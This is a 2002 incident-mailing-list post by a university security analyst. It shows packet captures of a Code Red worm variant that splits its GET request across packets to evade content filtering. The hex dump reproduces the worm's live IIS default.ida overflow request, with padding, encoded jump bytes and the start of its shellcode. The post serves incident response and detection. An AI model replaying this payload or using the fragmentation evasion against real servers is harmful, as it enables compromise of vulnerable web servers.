Re: new codered worm penetrates content-filtering

From: Chris Russel (russel@yorku.ca)
Date: 01/10/02 

Date: Thu, 10 Jan 2002 13:18:36 -0500 (EST)
From: Chris Russel <russel@yorku.ca>
To: <incidents@securityfocus.com>

For those who asked, here's a sample of the GET request packets. With
normal codered (and any other web traffic) the GET would be in the same
packet as the URL since there is no reason to fragment.
Ironically, the Don't Fragment bit is set...

08:05:00.285196 a.b.c.d.3237 > w.x.y.z.80: P 1:5(4) ack 1 win 16384 (DF)
payload:
0030 47 45 54 20 00 00 GE T ..

08:05:00.289638 a.b.c.d.3237 > w.x.y.z.80: P 5:513(508) ack 1 win 16384 (DF)
payload:
0030 2f 64 65 66 61 75 6c 74 2e 69 /d efault.i
0040 64 61 3f 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e da?NNNNN NNNNNNNN
0050 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e NNNNNNNN NNNNNNNN
0060 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e NNNNNNNN NNNNNNNN
0070 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e NNNNNNNN NNNNNNNN
0080 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e NNNNNNNN NNNNNNNN
0090 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e NNNNNNNN NNNNNNNN
00a0 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e NNNNNNNN NNNNNNNN
00b0 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e NNNNNNNN NNNNNNNN
00c0 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e NNNNNNNN NNNNNNNN
00d0 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e NNNNNNNN NNNNNNNN
00e0 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e NNNNNNNN NNNNNNNN
00f0 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e NNNNNNNN NNNNNNNN
0100 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e NNNNNNNN NNNNNNNN
0110 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e NNNNNNNN NNNNNNNN
0120 4e 4e 4e 25 75 39 30 39 30 25 75 36 38 35 38 25 NNN%u909 0%u6858%
0130 75 63 62 64 33 25 75 37 38 30 31 25 75 39 30 39 ucbd3%u7 801%u909
0140 30 25 75 36 38 35 38 25 75 63 62 64 33 25 75 37 0%u6858% ucbd3%u7
0150 38 30 31 25 75 39 30 39 30 25 75 36 38 35 38 25 801%u909 0%u6858%
0160 75 63 62 64 33 25 75 37 38 30 31 25 75 39 30 39 ucbd3%u7 801%u909
0170 30 25 75 39 30 39 30 25 75 38 31 39 30 25 75 30 0%u9090% u8190%u0
0180 30 63 33 25 75 30 30 30 33 25 75 38 62 30 30 25 0c3%u000 3%u8b00%
0190 75 35 33 31 62 25 75 35 33 66 66 25 75 30 30 37 u531b%u5 3ff%u007
01a0 38 25 75 30 30 30 30 25 75 30 30 3d 61 20 20 48 8%u0000% u00=a H
01b0 54 54 50 2f 31 2e 30 0d 0a 43 6f 6e 74 65 6e 74 TTP/1.0. .Content
01c0 2d 74 79 70 65 3a 20 74 65 78 74 2f 78 6d 6c 0a -type: t ext/xml.
01d0 48 4f 53 54 3a 77 77 77 2e 77 6f 72 6d 2e 63 6f HOST:www .worm.co
01e0 6d 0a 20 41 63 63 65 70 74 3a 20 2a 2f 2a 0a 43 m. Accep t: */*.C
01f0 6f 6e 74 65 6e 74 2d 6c 65 6e 67 74 68 3a 20 33 ontent-l ength: 3
0200 35 36 39 20 0d 0a 0d 0a 55 8b ec 81 ec 18 02 00 569 .... U.......
0210 00 53 56 57 8d bd e8 fd ff ff b9 86 00 00 00 b8 .SVW.... ........
0220 cc cc cc cc f3 ab c7 85 70 fe ff ff 00 00 00 00 ........ p.......
0230 e9 0a .. 

-- 
Chris Russel     | CNS Information Security
russel@yorku.ca  | York University, Toronto, Canada

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com

Quantcast